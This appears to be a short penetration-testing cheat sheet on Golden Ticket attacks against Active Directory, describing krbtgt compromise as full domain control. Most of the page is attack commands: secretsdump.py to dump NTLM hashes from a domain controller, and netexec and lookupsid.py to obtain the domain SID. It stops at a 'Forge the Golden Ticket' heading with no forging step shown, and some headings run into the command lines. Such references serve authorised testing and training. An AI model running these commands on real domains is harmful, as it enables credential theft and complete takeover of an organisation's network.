Golden Ticket Attacks
When we compromise the krbtgt account, we own the domain. We can then request any resource or system on the domain. A Golden Ticket gives us complete access to every machine.
Hashes
Secretsdump.py
$ secretsdump.py [domain]/[username]:'[password]'@[dc-ip] -just-dc-ntlmDomain SID
Netexec
$ nxc ldap [dc-ip] -u '[username]' -p '[password]' --get-sidlookupsid.py
$ lookupsid.py -hashes '[hash]' '[domain]/[username]@[DC FQDN]' 0Forge the Golden Ticket
Last updated